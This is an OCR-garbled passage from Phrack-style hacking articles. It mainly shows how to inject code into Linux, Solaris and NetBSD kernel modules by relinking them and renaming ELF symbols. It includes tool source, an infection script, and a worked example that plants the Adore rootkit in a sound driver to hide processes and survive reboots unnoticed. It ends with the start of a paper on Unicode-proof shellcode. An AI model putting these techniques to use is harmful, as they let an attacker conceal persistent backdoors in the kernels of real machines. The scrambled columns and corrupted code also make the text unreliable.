{ 

struct module mod_tmp, *mod; 

char *name, *n_name, *name_tmp = NULL; 

long namelen, n_namelen, i, error; 

unsigned long mod_user_size; 

struct module_ref *dep; 


/* Lots of sanity checks */ 


/* Ok, that’s about all the sanity we can stomach; copy the rest.*/ 


(1) if (copy_from_user((char *)modt+tmod_user_size, 
(char *)mod_user+mod_user_size, 
mod->size-mod_user_size)) { 

error = -EFAULT; 


goto err3; 


/* Other sanity checks */ 


/* Initialize the module. */ 
atomic_set (&mod->uc.usecount,1); 
mod->flags |= MOD_INITIALIZING; 

(2) if (mod->init && (error = mod->init()) != 0) { 
atomic_set (&mod->uc.usecount,0); 
mod->flags &= ~MOD_INITIALIZING; 
if (error > 0) /* Buggy module */ 

error = -EBUSY; 
goto err0; 


} 


atomic_dec(&mod->uc.usecount) ; 


After a few sanity checks, the struct module is copied from userland to 
kernelland by calling (1) copy_from_user(). Then (2) the init_module() 
function of the module being loaded is called using the mod->init() funtion 
pointer wich has been filled by the insmod utility. 


----[ 3.2 - .strtab modification 


We have seen that the address of the module’s init function is located 
using a string in the .strtab section. The modification of this string will 
allow us to execute another function than init_module() when the module is 
loaded. 

There are a few ways to modify an entry of the .strtab section. The 
-wrap option of ld can be used to do it but this option isn’t compatible 
with the -r option that we will need later (paragraph 3.3). We will see in 
paragraph 5.1 how to use xxd to do the work. I have coded a tool 
(paragraph 9.1) to automate this task. 


Here’s a short example: 


S cat test.c 
define MODULE 
define _ KERNEL __ 


#include <linux/module.h> 
include <linux/kernel.h> 


int init _module (void) 


printk ("<1> Into init_module()\n"); 
return 0; 
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int evil_module (void) 
{ 
printk 
return 0; 
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int cleanup_module (void) 


{ 
printk 
return 0; 


} 


S$ ce -O2 -c test.c 


Let’s have a look at the 


S objdump -t test.o 


test.o: file 
SYMBOL TABLE: 

0000000000000000 1 
0000000000000000 1 
0O000000000000000 1 
0000000000000000 1 
0000000000000000 1 
0000000000000000 1 
0000000000000000 1 
0000000000000000 1 
0000000000000000 g 
0000000000000000 
0000000000000014 
0000000000000028 


g 
g 


We are now going to modify 2 entries of the 
evil_module symbol’s name become init_module. 
because 2 symbols of the same nature can’t have the same 
following operations are carried out: 


init_module symbol 


df *ABS* 0000000000000000 test.c 

d .text 0000000000000000 

d .data 0000000000000000 

d .bss 0000000000000000 

d .modinfo 0000000000000000 

O .modinfo 0000000000000016 _ modu] 

d .rodata 0000000000000000 

d .comment 0000000000000000 

F .text 0000000000000014 init_modul 
*UND* 0000000000000000 printk 

F .text 0000000000000014 evil_modul 

F .text 0000000000000014 


("<1> Into evil_module()\n"); 


("<1> Into cleanup_module()\n") ; 


.symtab and .strtab sections: 


Format elf32-1i1386 


le _kernel_version 


e 


e 


cleanup_module 


.strtab section to make the 
First we must rename the 


name in the same ELF object. The 
rename 
1) anit _module ----> dumm_module 
2) evil_module ----> init_module 
S ./elfstrchange test.o init_module dumm_module 
[+] Symbol init_module located at O0x3dc 
[+] .strtab entry overwriten with dumm_module 
S ./elfstrchange test.o evil_module init_module 
[+] Symbol evil_module located at Ox3ef 
[+] .strtab entry overwriten with init_module 


S objdump -t test.o 


test.o: file 
SYMBOL TABLE: 

0000000000000000 
0000000000000000 
0000000000000000 
0000000000000000 
0000000000000000 
0000000000000000 
0000000000000000 
0000000000000000 
0000000000000000 
0000000000000000 


df *ABS* 0000000000000000 test.c 

d  .text 0000000000000000 

d .data 0000000000000000 

dad .bss 0000000000000000 

d .modinfo 0000000000000000 

O .modinfo 0000000000000016 _ modu] 

d .rodata 0000000000000000 

d .comment 0000000000000000 

F .text 0000000000000014 dumm_modul 
*UND* 0000000000000000 printk 


Format elf32-1i1386 


le _kernel_version 
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0000000000000014 g F .text 0000000000000014 init_module 
0000000000000028 g F .text 0000000000000014 cleanup_module 


insmod test.o 
tail -n 1 /var/log/kernel 
May 4 22:46:55 accelerator kernel: Into evil_module() 


As we can see, the evil_module() function has been called instead of 
init_module(). 


----[ 3.3 - Code injection 


The preceding tech makes it possible to execute a function instead of 
another one, however this is not very interesting. It will be much better 
to inject external code into the module. This can be *easily* done by using 
the wonderfull linker: ld. 


$ cat original 
define MODUL 
define _ KERNEL 


Cc 


eal 


include <linux/module.h> 
include <linux/kernel.h> 


int init _module (void) 


printk ("<1> Into init_module()\n"); 
return 0; 


} 


int cleanup_module (void) 

{ 
printk ("<1> Into cleanup_module()\n"); 
return 0; 


} 


S$ cat inject.c 
define MODULE 
define _ KERNEL __ 


include <linux/module.h> 
include <linux/kernel.h> 


int inje_module (void) 

{ 
printk ("<1> Injected\n") ; 
return 0; 


ce -O2 -c original.c 
ce -O2 -c inject.c 


UW 


Here starts the important part. The injection of the code is not a 
problem because kernel modules are relocatable ELF object files. This type 
of objects can be linked together to share symbols and complete each other. 
However a rule must be complied: the same symbol can’t exist in several 
modules which are linked together. We use ld with the -r option to make a 
partial link wich creates an object of the same nature as the objects wich 
are linked. This will create a module which can be loaded by the kernel. 


$ ld -r original.o inject.o -o evil.o 
S$ mv evil.o original.o 
S objdump -t original.o 
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file format elf32-i1386 


SYMBOL TABLE: 
0000000000000000 1 d .text 0000000000000000 
0000000000000000 1 d *ABS* 0000000000000000 
0000000000000000 1 d .rodata 0000000000000000 
0000000000000000 1 d .modinfo 0000000000000000 
0000000000000000 1 d .data 0000000000000000 
0000000000000000 1 d .bss 0000000000000000 
0000000000000000 1 d .comment 0000000000000000 
0000000000000000 1 d *ABS* 0000000000000000 
0000000000000000 1 d *ABS* 0000000000000000 
0000000000000000 1 d *ABS* 0000000000000000 
0000000000000000 1 df *ABS* 0000000000000000 original.c 
0000000000000000 1 O .modinfo 0000000000000016 __module_kernel_version 
0000000000000000 1 df *ABS* 0000000000000000 inject.c 
0000000000000016 1 O .modinfo 0000000000000016 __module_kernel_version 
0000000000000014 g F .text 0000000000000014 cleanup_module 
0000000000000000 g F .text 0000000000000014 init_module 
0000000000000000 *UND* 0000000000000000 printk 
0000000000000028 g F .text 0000000000000014 inje_module 
The inje_module() function has been linked into the module. Now we are 


going to modify the 
of init_module(). 


.strtab section to make inje_module() 


S ./elfstrchange original.o init_module dumm_module 


[+] 
+] 


= 


a 


+] 
+] 


= 


Symbol init_module located at 0x4a8 
.strtab entry overwriten with dumm_module 


Symbol inje_module located at 0x4bb 
.strtab entry overwriten with init_module 


S ./elfstrchange original.o inje_module init_module 


be called instead 


Let’s fire it up: 


insmod original.o 
tail -n 1 /var/log/kernel 


May 14 20:37:02 accelerator kernel: 


And the magic occurs :) 


----[ 3.4 - Keeping stealth 


Most of the time, 
the init_module() 
purpose for our profit. 


the .strtab hack, the real 


we will infect a module which is 
function with another one, 
However, 
properly it can be easily detected. 
to inject code into a module without modifying its regular behaviour. 


Injected 


in use. 
the module loses 


If we replace 
its original 


if the infected module does not work 


But there is a solution that permits 


we put a call 
init_module() 
keep its regu 


to dumm_modul 
function will 


e() 


lar behaviour. 


After 

init_module() function is named dumm_module. If 
into our evil_module() function, the real 

be called at initialization and the module will 


replace 
init_module ------ > dumm_module 
inje_module ------ > init_module (will call dumm_module) 


S$ cat stealth.c 
define MODULE 
define _ KERNEL 


include <linux/module.h> 
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#include <linux/kernel.h> 


int inje_module (void) 

{ 
dumm_module (); 
printk ("<1> Injected\n") ; 
return 0; 


cc -0O2 -c stealth.c 

ld -r original.o stealth.o -o evil.o 
mv evil.o original.o 
./elfstrchange original.o init_module dumm_module 
+] Symbol init_module located at 0x4c9 

+] .strtab entry overwriten with dumm_module 


S ./elfstrchange original.o inje_module init_module 
+] Symbol inje_module located at 0x4e8 
+] .strtab entry overwriten with init_module 


insmod original.o 

tail -n 2 /var/log/kernel 

May 17 14:57:31 accelerator kernel: Into init_module() 
May 17 14:57:31 accelerator kernel: Injected 


Perfect, the injected code is executed after the regular code so that the 
modification is stealth. 


--[ 4 - Real life example 


The method used to modify init_module() in the preceding parts can be 
applied without any problem to the cleanup_module() function. Thus, we can 
plan to inject a complete module into another one. I’ve injected the well 


known Adore[2] rootkit into my sound driver (i810_audio.o) with a rather 
simple handling. 


----[ 4.1 - Lkm infecting mini-howto 


1) We have to slightly modify adore.c 


Insert a call to dumm_module() in the init_module() function’s code 
Insert a call to dummcle_module() in the cleanup_module() module 
function’s code 

Replace the init_module function’s name with evil_module 

Replace the cleanup_module function’s name with evclean_module 


Oe 


2) Compile adore using make 


3) Link adore.o with i810_audio.o 
ld -r i810_audio.o adore.o -o evil.o 


If the module is already loaded, you have to remove it: 
rmmod i810_audio 


mv evil.o i810_audio.o 


4) Modify the .strtab section 


replace 
init_module ------ > dumm_module 
evil_module  ------ > init module (will call dumm_module) 
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cleanup_modul > evclean_module 
evclean_modul > cleanup_module (will call evclean_module) 


S ./elfstrchange i810_audio.o init_module dumm_module 
+] Symbol init_module located at Oxa2db 
+] .strtab entry overwriten with dumm_module 


S ./elfstrchange i810_audio.o evil_module init_module 
+] Symbol evil_module located at Oxa4dl 
+] .strtab entry overwriten with init_module 


S ./elfstrchange i810_audio.o cleanup_module dummcle_module 
+] Symbol cleanup_module located at 0xal69 
+] .strtab entry overwriten with dummcle_module 


S ./elfstrchange i810_audio.o evclean_module cleanup_module 
+] Symbol evclean_module located at 0xa421 
+] .strtab entry overwriten with cleanup_module 


5) Load and test the module 


insmod i810_audio 
./ava 
Usage: ./ava {h,u,r,R,i,v,U} [file, PID or dummy (for U)] 


hide file 

unhide file 
execute as root 
remove PID forever 
uninstall adore 
make PID invisible 
make PID visible 


grow rR oo 


# ps 

PID TTY TIME CMD 
2004 pts/3 00:00:00 bash 
2083 pts/3 00:00:00 ps 


# ./ava i 2004 

Checking for adore 0.12 or higher 
Adore 0.53 installed. Good luck. 
Made PID 2004 invisible. 


root@accelerator:/home/truff/adore# ps 
PID TTY TIME CMD 
# 


Beautifull :) I’ve coded a little shell script (paragraph 9.2) which does 
some part of the work for lazy people. 


----[ 4.2 - I will survive (a reboot) 
When the module is loaded, we have two options that have pros and cons: 


* Replace the real module located in /lib/modules/ by our infected one. 
This will ensure us that our backdoor code will be reloaded after a 
reboot. But, if we do that we can be detected by a HIDS (Host Intrusion 
Detection System) like Tripwire [7]. However, a kernel module is not 
an executable nor a suid file, so it won’t be detected unless the HIDS 
is configured to be paranoid. 


* Let the real kernel module unchanged in /lib/modules and delete our 
infected module. Our module will be removed when rebooting, but it 
won’t be detected by a HIDS that looks for changed files. 
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--[ 5 - What about other systems ? 
----[ 5.1 - Solaris 


I’ve used a basic kernel module from 


[8] to illustrate this example. 


Solaris kernel modules use 3 principal functions: 
— _init will be called at module initialisation 
—- _fini will be called at module cleanup 


- _info prints info about the module when issuing a modinfo 


S$ uname -srp 
SunOS 5.7 sparc 


$ cat mod.c 

include <sys/ddi.h> 
include <sys/sunddi.h> 
include <sys/modctl.h> 


extern struct mod_ops mod_miscops; 


static struct modlmisc modlmisc = { 
&mod_miscops, 
"Real Loadable Kernel Module", 
}; 


static struct modlinkage modlinkage = 


MODREV_1, 
(void *)&modlmisc, 
NULL 


}; 


int _init (void) 


{ 


int i; 
if ((i1 = mod_install (émodlinkage) ) 
cmn_err(CE_NOTE, "Could 
else 
cmn_err(CE_NOTE, "mod: 


return i; 


} 


int _info(struct modinfo *modinfop) 


{ 


{ 


!'= Q) 
not instal 


1 


module\n"); 


successfull 


Ly: 


return (mod_info(&modlinkage, modinfop)); 


} 


int _fini (void) 


{ 


installed"); 


ines a 

if ((i1 = mod_remove (&modlinkage)) != 0) 
cmn_err(CE_NOTE, "Could not remove module\n"); 

else 


cmn_err(CE_NOTE, "mod: 
return i; 


[7] 


S$ gcc -m64 -D_K 
S$ ld -r -o mod mod.o 
S$ file mod 


successfully removed"); 


RNEL —DSRV4 -DSOL2 -c mod.c 


mod: ELF 64-bit MSB relocatable SPARCV9 Version 1 


As we have seen in the Linux case, the cod 


WwW 


ar 


going to inject must 


contains a call to the real init function to make the module keeps its 
regular behaviour. However, we are going to face a problem: if we modify 
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the .strtab section after the link operation, the dynamic loader doesn’t 
find the _dumm() function and the module can’t be loaded. I’ve not 
invistigated a lot into this problem but i think that the dynamic loader 
on Solaris doesn’t looks for undefined symbols into the module itself. 
However, this problem can be easily solved. If we change the real _init 
.strtab entry to _dumm before the link operation, everything works well. 


S$ readelf -S mod 
There are 10 section headers, starting at offset 0x940: 


Section Headers: 


Nr] Name Type Address Offset 

Size EntSize Flags Link Info Align 

0 NULL 0000000000000000 00000000 
0000000000000000 0000000000000000 0) 0 0 

1] .text PROGBITS 0000000000000000 00000040 
0000000000000188  0000000000000000 AX 0) 0) 4 

2] .rodata PROGBITS 0000000000000000 000001c8 
000000000000009b 0000000000000000 A 0) 0) 8 

3] .data PROGBITS 0000000000000000 00000268 
0000000000000050 0000000000000000 WA 0) 0) 8 

4] .symtab SYMTAB 0000000000000000 000002b8 
0000000000000210 0000000000000018 5 e 8 

5] .strtab STRTAB 0000000000000000 000004c8 
0000000000000065 0000000000000000 0) 0) 1 

6] .comment PROGBITS 0000000000000000 0000052d 
0000000000000035 0000000000000000 0) 0) 1 

7] +.«.shstrtab STRTAB 0000000000000000 00000562 
000000000000004e 0000000000000000 0) 0) 1 

8] .rela.text RELA 0000000000000000 000005b0 
0000000000000348 0000000000000018 4 1 8 

9] .rela.data RELA 0000000000000000 dO00008f8 
0000000000000048 0000000000000018 4 3 8 


Key to Flags: 
W (write), A (alloc), X (execute), M (merge), S (strings) 
I (info), L (link order), G (group), x (unknown) 
O (extra OS processing required) o (OS specific), p (processor specific) 


The .strtab section starts at offset 0x4c8 and has a size of 64 bytes. 
We are going to use vi and xxd as an hex editor. Load the module into vi 
with: vi mod. After that use :%!xxd to convert the module into hex values. 
You will see something like this: 


00004c0: 0000 0000 0000 0000 006d 6f64 006d 6f£64 ......... mod.mod 
00004d0: 2e63 006d 6f64 6c69 6eb6b 6167 6500 6d6éf .c.modlinkage.mo 
00004e0: 646c 6d69 7363 006d 6f64 5f6d 6973 636f dlimisc.mod_misco 
O0004f0: 7073 OO5f 696e 666f O06d 6f64 5f69 6e73 ps._info.mod_ins 
0000500: 7461 6c6c O05f 696e 6974 006d 6f64 5f69 tall._init.mod_i 


AKRAKRAAAAA 


We modify 4 bytes to replace _init by _dumm. 


00004c0: 0000 0000 0000 0000 006d 6f64 006d 6f64 ......... mod.mod 
00004d0: 2e63 006d 6f64 6c69 b6eb6b 6167 6500 6d6éf .c.modlinkage.mo 
00004e0: 646c 6d69 7363 006d 6f64 5f6d 6973 636f dlimisc.mod_misco 
O00004f0: 7073 OO5f 696e 666f O06d 6f64 5f69 6e73 ps._info.mod_ins 
0000500: 7461 6c6c O05f 6475 6d6d 006d 6f64 5f69 tall._init.mod_i 


AKRAKRAARKAA 


We use :%!xxd -r to recover the module from hex values, then we sav 
and exit :wq . After that we can verify that the replacement is 
successfull. 


S objdump -t mod 


mod: file format elf64-sparc 
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SYMBOL TABLE: 
0000000000000000 1 df *ABS* 0000000000000000 mod 
0000000000000000 1 d .text 0000000000000000 
0000000000000000 1 d .rodata 0000000000000000 
0000000000000000 1 d .data 0000000000000000 
0000000000000000 1 d *ABS* 0000000000000000 
0000000000000000 1 d *ABS* 0000000000000000 
0000000000000000 1 d  .comment 0000000000000000 
0000000000000000 1 d *ABS* 0000000000000000 
0000000000000000 1 d *ABS* 0000000000000000 
0000000000000000 1 d *ABS* 0000000000000000 
0000000000000000 1 df *ABS* 0000000000000000 mod.c 
0000000000000010 1 O .data 0000000000000040 modlinkage 
0000000000000000 1 O .data 0000000000000010 modlmisc 
0000000000000000 *UND* 0000000000000000 mod_miscops 
00000000000000a4 g F .text 0000000000000040 _info 
0000000000000000 *UND* 0000000000000000 mod_install 
0000000000000000 g F .text 0000000000000188 _dumm 
0000000000000000 *UND* 0000000000000000 mod_info 
0000000000000000 UND* 0000000000000000 mod_remove 
00000000000000e4 g F .text 0000000000000188 _fini 
0000000000000000 *UND* 0000000000000000 cmn_err 

The _init symbol has been replaced by _dumm. Now we can directly inject 


a function which name is _init without any problem. 


S$ cat evil.c 
int _init (void) 


{ 


_ dumm 


(); 


emn_err(1,"evil: 


return 0; 


gcc -m64 —-D_KERN 
ld -r -o inject inject.o 


The injecting part using ld: 


ld -r -o evil mod inject 


Load the module: 


modload evil 
tail 
5: LOY 58333 
15. 025.8533 


luna unix: 
luna unix: 


-f£ /var/adm/messages 


EL -DSRV4 -DSOL2 -c inject.c 


NO 


ICE 


De 


NOTICE 


De 


mod: 
evil: 


= 


a complete module into another one. 


S22 = *BSD 


fo) 


oo uname —srm 


FreeBSD 4.8-STABL 


5.2.1 - FreeBSD 


E i386 


% file /modules/daemon_saver.ko 


ELF 32-bit LSB 


shared object, 


successfull 
successful 


successfully installed"); 


y install 


ed 
led 


ly instal 


Intel 80386, 


The same operation can be carried out for the _fini function to inject 


version 1 


daemon_saver.ko: 
(FreeBSD), not stripped 


we can’t 
mechanism 


As we can see, FreeBSD kernel modules ar 
use ld to link aditionnal 


shared objects.Thus, 
code into the module. Furthermore, th 
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which is in use to load a module is complete] 


13 


ly different from the one used 


on Linux or Solaris systems. You can have a 
/usr/src/sys/kern/kern_linker.c 


look to it in 
Any name can be used for the init/cleanup 


function. At initialisation the loader finds the address of the init 
function into a structure stored in the .data section. Then the .strtab 
hack can’t be used too. 
a [ 5.2.2 —- NetBSD 
S file nvidia.o 
nvidia.o: ELF 32-bit LSB relocatable, Intel 80386, version 1 
(SYSV), not stripped 

We can inject code into a NetBSD kernel module because it’s a 
relocatable ELF object. When modload loads a kernel module it links it 
with the kernel and execute the code placed at the entry point of the 
module (located in the ELF header). 


After the link operation we can change this entry point, 
l option 


necessary because modload has a special 
it which symbol to use for the entry point. 


but it is not 


(-e) that allows to tell 


Here’s th xample module we are going to infect: 

S$ cat gentil_lkm.c 

include <sys/cdefs.h> 

include <sys/param.h> 

include <sys/ioctl.h> 

include <sys/systm.h> 

include <sys/conf.h> 

include <sys/lkm.h> 
MOD_MISC("gentil"); 
int gentil_lkmentry(struct lkm_table *, int, int); 
int gentil_lkmload(struct lkm_table *, int); 
int gentil_lkmunload(struct lkm_table *, int); 
int gentil_lkmstat (struct lkm_table *, int); 
int gentil_lkmentry(struct lkm_table *lkmt, int cmd, int ver) 
{ 

DISPATCH(lkmt, cmd, ver, gentil_lkmload, gentil_lkmunload, 
gentil_lkmstat); 


int gentil_lkmload(struct lkm_table *lkmt, 


printf ("gentil: Hel world! \n"); 


return (0); 


lo, 


int cmd) 


int gentil_lkmunload(struct lkm_table *lkmt, int cmd) 
{ 
printf ("gentil: Goodbye, world!\n"); 
return (0); 
} 
int gentil_lkmstat (struct lkm_table *lkmt, int cmd) 


printf ("gentil: 
return (0); 


How you doin’, 


H "s the cod 


r that will be injected: 


S$ cat evil_lkm.c 
#include <sys/cdefs.h> 


world?\n"); 
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include <sys/param.h> 
include <sys/ioctl.h> 
include <sys/systm.h> 
include <sys/conf.h> 
include <sys/lkm.h> 


int gentil_lkmentry(struct lkm_table *, int, int); 
int 
inject_entry(struct lkm_table *lkmt, int cmd, int ver) 


{ 
switch(cmd) { 
case LKM_E_LOAD: 
i F("evil: in place\n"); 


case LKM_E_ UNLOAD: 
rintf£("evil: i’11 be back! \n"); 


case LKM_E_ STAT: 
printf("evil: report in progress\n") ; 


default: 


printf ("edit: unknown command\n") ; 


} 


return gentil_lkmentry(lkmt, cmd, ver); 


After compiling gentil and evil we link them together: 


S ld -r -o evil.o gentil.o inject.o 
S$ mv evil.o gentil.o 


modload -e evil_entry gentil.o 
Module loaded as ID 2 


modstat 
Type Id Offset Loadaddr Size Info Rev Module Name 
DEV 0 -1/108 d3ed3000 0004 d3ed3440 1 mmr 
DEV 1 -1/180 d3fa6000 03e0 d4090100 1 nvidia 
MISC 2 0 e€45b9000 0004 €45b9254 1 gentil 


modunload -n gentil 


dmesg | tail 


evil: in place 

gentil: Hello, world! 

evil: report in progress 
gentil: How you doin’, world? 
evil: i’11l be back! 

gentil: Goodbye, world! 


Ok, everything worked like a charm :) 


Siar [ 5.2.3 - OpenBSD 


OpenBSD don’t use ELF on x86 architectures, so the tech cannot be used. 
I’ve not tested on platforms that use ELF but i think that it looks like 
NetBSD, so the tech can certainly be applied. Tell me if you manage to do 
it on OpenBSD ELF. 


-—-[ 6 — Conclusion 
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This paper has enlarged the number of techniques that allows to 
dissimulate code into the kernel. I have presented this technique because 
it is interesting to do it with very few and easy manipulations. 

Have fun when playing with it :) 
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-—-[ 9 -— Codes 


----[ 9.1 - E1fStrChange 


elfstrchange.c by truff <truff@projet7.org> 
Change the value of a symbol name in the .strtab section 


Usage: elfstrchange elf_object sym_name sym_name_replaced 


include <stdlib.h> 
#include <stdio.h> 
include <elf.h> 


define FATAL(X) { perror (X);exit (EXIT_FAILUR 


E 
— 
~“e 

ay, 


int ElfGetSectionName (FILE *fd, E1£32 Word sh_name, 
E1f£32_ Shdr *shstrtable, char *res, size_t len); 
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1£32_oOff 


A 


1£32_oOff 
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A 


A 


int main (int argc, char **argv) 
{ 
int i; 
int len = 0; 
char *string; 
FILE *fd; 
E1f£32_ Ehdr hdr; 
E1f32_Shdr symtab, strtab; 
E1£32_Sym sym; 
E1f32_ Off symoffset; 
fd = fopen (argv[1l], "rt+"); 
if (fd == NULL) 
FATAL ("fopen"); 
if (fread (&hdr, sizeof (E1£32_Ehdr), 1, fd) 
FATAL ("E1f header corrupted"); 
if (ElfGetSectionByName (fd, é&hdr, ".symtab", &symtab) == -1) 
{ 
fprintf (stderr, "Can’t get .symtab section\n"); 
exit (EXIT_FAILURE); 
} 
if (ElfGetSectionByName (fd, é&hdr, ".strtab", &strtab) == -1) 
{ 
fprintf (stderr, "Can’t get .strtab section\n"); 
exit (EXIT_FAILURE) ; 
} 
symoffset = ElfGetSymbolByName (fd, &symtab, &strtab, argv[2], 
if (symoffset == -1) 
{ 
fprintf (stderr, "Symbol %s not found\n", argv[2]); 
exit (EXIT_FAILURE); 


1lfGetSymbol] 


1fGet Symbol] 


—_ 
ry 


lName 


aru 
G 


IByName (FILE 


*fd; 


£32_Shdr *strtab, 


(FILE 
L£32 Shdr *strtable, 


* fay 


16 


E1f32_Shdr *symtab, 
char *name, 


E1f32_ Word sym_name, 
char *res, 


ELf£32_Sym *sym); 


size_t len); 


&Sym) ; 


printf ("[+] Symbol %s located at Ox%x\n", argv[2], symoffset); 
if (fseek (fd, symoffset, SEEK_SET) == -1) 
FATAL ("fseek"); 
if (fwrite (argv[3], 1, strlen(argv[3]), fd) < strlen (argv[3])) 
FATAL ("fwrite"); 
printf ("([+] .strtab entry overwriten with %s\n", argv[3]); 
fclose (fd); 
return EXIT_SUCCESS; 
} 
E1f32_ Off ElfGetSymbolByName (FILE *fd, E1f32_Shdr *symtab, 
E1f32_Shdr *strtab, char *name, E1Lf32_Sym *sym) 
{ 
Int: i; 


char symname[255]; 


E1f32_ Off offset; 
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for (i=0; i<(symtab->sh_size/symtab->sh_entsize); i++) 
{ 
if (fseek (fd, symtab->sh_offset + (i * symtab->sh_entsize), 


SEEK_SET) == -1) 
FATAL ("fseek"); 


if (fread (sym, sizeof (E1f32_Sym), 1 
FATAL ("Symtab corrupted") ; 


memset (symname, 0, sizeof (symname) ) 


nm EO) <1) 


1’ 


offset = ElfGetSymbolName (fd, sym->st_name, 
sizeof (symname) ); 


strtab, symname, 
if ('strcemp (symname, name) ) 
return offset; 


} 


return -1; 


fFGetSectionByIndex (FILE *fd, E1f32_ 


1f£32_Shdr *shdr) 


Ehdr *ehdr, E1f£32_Half index, 


if (fseek (fd, ehdr->e_shoff + (index * 
SEEK_SET) == -1) 
FATAL ("fseek"); 


if (fread (shdr, sizeof (E1f32_Shdr), 1 
FATAL ("Sections header corrupted"); 


return 0; 


hdr->e_shentsize), 


, fd) < 1) 


int ElfGetSectionByName (FILE *fd, E1f£32_ 


Ehdr *ehdr, 


int 1; 
char name[255]; 
E1f£32_ Shdr shstrtable; 


/* 
* Get the section header string table 


Af 


memset (name, 0, sizeof (name)); 


for (i=0; i<ehdr->e_shnum; itt) 


{ 


E1f£32_ Shdr *shdr) 


ElfGetSectionByIndex (fd, hdr, hdr->e_shstrndx, 


char *section, 


&shstrtable); 


if (fseek (fd, ehdr->e_shoff + (i * ehdr->e_shentsize), 


SEEK_SET) == -1) 
FATAL ("fseek"); 


if (fread (shdr, sizeof (El1f£32_Shdr), 


FATAL ("Sections header corrupted") ; 


A 


ElfGetSectionName (fd, shdr->sh_name, 


if (!strcemp (name, section) ) 
{ 
return 0; 
} 
} 


return —-1; 


1, fd) < 1) 


&éshstrtable, 
name, sizeof (name)); 
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ElfGetSectionName (FILE *fd, E1f£32 Word sh_name, 
E1f£32_ Shdr *shstrtable, char *res, size_t len) 


size t i= 0; 


if (fseek (fd, shstrtable->sh_offset + sh_name, SEEK SET) == -1) 
FATAL ("fseek"); 


while ((i < len) || *res == ’\0’) 


*res = fgetc (fd); 


return 0; 


E1f32_ Off ElfGetSymbolName (FILE *fd, E1f32_Word sym_name, 
E1f£32_ Shdr *strtable, char *res, size_t len) 


{ 


size t i= 0; 


if (fseek (fd, strtable->sh_offset + sym_name, SEEK_SET) == -1) 
FATAL ("fseek"); 


while ((i < len) || *res == ’\0’) 


*res = fgetc (fd); 


return (strtable->sh_offset + sym_name); 


/* EOF */ 


----] 9.2 Lkminject 


!/bin/sh 


lkminject by truff (truff@projet7.org) 


Injects a Linux lkm into another one. 


Usage: 
./lkminfect.sh original_lkm.o evil_lkm.c 


Notes: 
You have to modify evil_lkm.c as explained bellow: 

In the init_module code, you have to insert this line, just after 
variables init: 

dumm_module (); 


In the cleanup_module code, you have to insert this line, just after 
variables init: 


fF Gummcle_module (); 
http://www.projet7.org - Security Researchs - 
EE HH EE HH EH EHH HEE HE EE EEE EE EE EEE EEE EE EE EE EE EH EEE EE EE EEE 


sed -e s/init_module/evil_module/ $2 > tmp 
mv tmp $2 
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sed -e s/cleanup_module/evclean_module/ $2 > tmp 
mv tmp $2 


Replace the following line with the compilation line for your evil lkm 
if needed. 
make 


ld -r $1 S(basename $2 .c).o -o evil.o 


init_module dumm_module 
evil_module init_module 
cleanup_module dummcle_module 
evclean_module cleanup_module 


./elfstrchange evil. 
./elfstrchange evil 
./elfstrchange evil. 
./elfstrchange evil. 


oO0o0°0 


mv evil.o $1 
rm elfstrchange 


(= [) -EOF J 
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==Phrack Inc.== 


Volume 0x0b, Issue 0x3d, Phile #0x0b of Ox0f 


| [ Building IA32 'Unicode-Proof’ Shellcodes ] 


| [ obscou <obscou@dr.com| |wishkah@chek.com> ] 


--[{ Contents 


0 — The Unicode Standard 


1 - Introduction 
2 - Our Instructions set 
3 - Possibilities 


4 - The Strategy 
5 -—- Position of the code 
6 — Conclusion 


7 — Appendix : Code 


-—-[ 0 - The Unicode Standard 


While exploiting buffer overflows, Ww sometime face a difficulty 
character transformations. In fact, the exploited program may have modified 
our buffer, by setting it to lower/upper case, or by getting rid of 
non-alphanumeric characters, thus stopping the attack as our shellcode 
usually can’t run anymore. The transformation we are dealing here with is 
the transformation of a C-type string (common zero terminated string) toa 
Unicode string. 


Here is a quick overview of what Unicode is (source : www.unicode.org) 


"What is Unicode? 

Unicode provides a unique number for every character, 
no matter what the platform, 

no matter what the program, 

no matter what the language." 


—-- www.unicode.org 


In fact, because Internet has become so popular, and because we all have 
different languages and therefore different charaters, there is now a need 
to have a standard so that computers can exchange data whatever the 
program, platform, language, network etc... 

Unicode is a 16-bits character set capable of encoding all known characters 
and used as a worldwide character-encoding standard. 


Today, Unicode is used by many industry leaders such as 


IBM 

Microsoft 

Oracle 

Sun 

and many others... 
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like 
list) 


Microsoft Windows CE, Windows 
GNU/Linux with glibc 2.2.2 or 
Apple Mac OS 9.2, 
Compaq’s Tru64 UNIX, Open VMS 


Mac OS X 10. 


NT, Windows 2000, 
newer — FAQ support 
1, Mac OS X Server, 


and Windows XP 


ATSUI 


IBM AIX, AS/400, OS/2 
SCO UnixWare 7.1.0 
Sun Solaris 


And of course, 


http://www.unicode.org/charts/ 


It looks like this 
Range Character set 
0000-O07F Basic Latin 
0080-O0FF Latin-1 Supplement 
0100-O17F atin Extended-A 
[ue ies [eee] 
0370-O3FF Greek and Coptic 
mere ere 
0590-O5FF Hebrew 
0600-06FF Arabic 
Leis leeacite') 
3040-309F Japanese Hiragana 
30A0-30FF Japanese Katakana 


any software that runs 


under thoses systems... 


and so on until everybody is happy 


Unicode 4.0 includes characters for 


Basic Latin 
Latin-1 Supplement 

atin Extended-A 

atin Extended-B 

IPA Extensions 

Spacing Modifier Letters 
Combining Diacritical Marks 
Greek Supplemental 
Cyrillic Miscellaneous 
Cyrillic Supplement 
Armenian 

Hebrew 

Arabic 

Syriac 

Thaana 

Devanagari 

Bengali 

Gurmukhi 

Gujarati 

Oriya 

Tamil 

Telugu 
Kannada 
Malayalam 
Sinhala 
Thai 


Myanmar 
Georgian 


displays the Unicode table of caracters 


Block Elements 
Geometric Shapes 
Miscellaneous Symbols 
Dingbats 


Miscellaneous Math. Symbols-A 
Supplemental Arrows-A 

Braille Patterns 

Arrows-B 

Mathematical Symbols-B 

Supplemental Mathematical Operators 


CJK Radicals Supplement 

Kangxi Radicals 

Ideographic Description Characters 
CJK Symbols and Punctuation 
Hiragana 

Katakana 

Bopomofo 

Hangul Compatibility Jamo 

Kanbun 

Bopomofo Extended 

Katakana Phonetic Extensions 
Enclosed CJK Letters and Months 
CJUK Compatibility 

CJK Unified Ideographs 
Yijing Hexagram Symbols 
CJUK Unified Ideographs 
Yi Syllables 

Yi Radicals 

Hangul Syllables 

High Surrogates 


Extension A 
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Hangul Jamo Low Surrogates 

Ethiopic Private Use Area 

Cherokee CJUK Compatibility Ideographs 
Unified Canadian Aboriginal Syllabic Alphabetic Presentation Forms 
Ogham Arabic Presentation Forms-A 
